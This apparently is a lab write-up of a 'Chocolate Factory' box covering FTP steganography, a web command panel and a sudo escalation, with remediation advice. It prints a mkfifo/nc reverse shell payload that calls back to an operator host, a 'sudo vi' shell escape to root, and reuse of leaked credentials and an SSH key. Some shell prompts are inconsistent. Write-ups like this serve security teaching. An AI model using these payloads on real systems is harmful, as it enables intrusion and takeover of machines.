Case file

FTP stego, web panel RCE, and sudo vi to Fernet root

Intermediate themed engagement: anonymous FTP stego and a command panel yielded a shell; charlie’s SSH key from teleport; sudo vi escalated to root; a Fernet key from an earlier binary decrypted the root artifact.

Intermediate28 minLinux · Stego · Web · Privilege Escalation
  • Anonymous FTP delivered a stego image. An unauthenticated command panel on home.php gave RCE; validate.php and teleport enabled SSH as charlie; sudo vi and a recovered Fernet key finished root.

  • Anonymous FTP and steghide fed recon. home.php executed a mkfifo reverse shell.

  • validate.php held charlie’s password; teleport provided the private key for SSH.

  • NOPASSWD vi spawned a root shell. Fernet key from the panel phase decrypted root.py.

01

Engagement summary

Anonymous FTP delivered a stego image. An unauthenticated command panel on home.php gave RCE; validate.php and teleport enabled SSH as charlie; sudo vi and a recovered Fernet key finished root.

Chocolate Factory (10.10.14.239) exposed vsftpd with anonymous read of gum_room.jpg. steghide (empty passphrase) extracted credential material. Directory brute force found /home.php — a command execution panel — and login artifacts. From the panel we recovered a Fernet key via strings on a local binary and opened a reverse shell. validate.php disclosed charlie / cn7824; /home/charlie/teleport held an SSH private key. As charlie, sudo -l allowed /usr/bin/vi without a password; GTFOBins vi spawned root. Decrypting /root/root.py with the earlier Fernet key recovered the final artifact.

Business impact

Anonymous FTP plus an unauthenticated command panel is intentional RCE. sudo vi without password is root by design. Remove debug panels from production, disable anonymous FTP, and never grant interactive editors via sudo.

02

FTP stego and command panel RCE

Anonymous FTP and steghide fed recon. home.php executed a mkfifo reverse shell.

OPERATOR · FTP / STEGO

savvy@lab:~$ nmap -sV 10.10.14.239

21/tcp open ftp vsftpd 3.0.3

22/tcp open ssh OpenSSH 7.6p1

80/tcp open http Apache httpd 2.4.29

savvy@lab:~$ ftp 10.10.14.239

Name: anonymous

ftp> get gum_room.jpg

savvy@lab:~$ steghide extract -sf gum_room.jpg -p ''

wrote extracted data to b64.txt

OPERATOR · PANEL RCE

savvy@lab:~$ dirsearch -u http://10.10.14.239

/home.php (Status: 200)

savvy@lab:~$ nc -lvnp 4444

# home.php cmd: rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc OPERATOR 4444 >/tmp/f

savvy@lab:/var/www/html$

savvy@lab:~$ strings key_binary | grep -E 'Fernet|VkgXh'

-VkgXhFf6sAEcAwrC6YR-SZbiuSb8ABXeQuvhcGSQzY=

03

Credentials and SSH as charlie

validate.php held charlie’s password; teleport provided the private key for SSH.

OPERATOR · SSH

savvy@lab:~$ grep -E 'user|pass' validate.php

charlie / cn7824

savvy@lab:~$ cp /home/charlie/teleport id_rsa && chmod 600 id_rsa

savvy@lab:~$ ssh charlie@10.10.14.239 -i id_rsa

savvy@lab:~$

04

sudo vi and Fernet decrypt

NOPASSWD vi spawned a root shell. Fernet key from the panel phase decrypted root.py.

OPERATOR · ROOT

savvy@lab:~$ sudo -l

(ALL : !root) NOPASSWD: /usr/bin/vi

savvy@lab:~$ sudo vi -c ':!/bin/sh' /dev/null

root@lab:~# python3 /root/root.py

# decrypt with Fernet key recovered earlier from strings

root artifact recovered

Remediation

Disable anonymous FTP and remove stego-bearing assets from shares. Delete command-execution panels. Replace sudo vi with least-privilege tooling; store decryption keys outside world-readable binaries.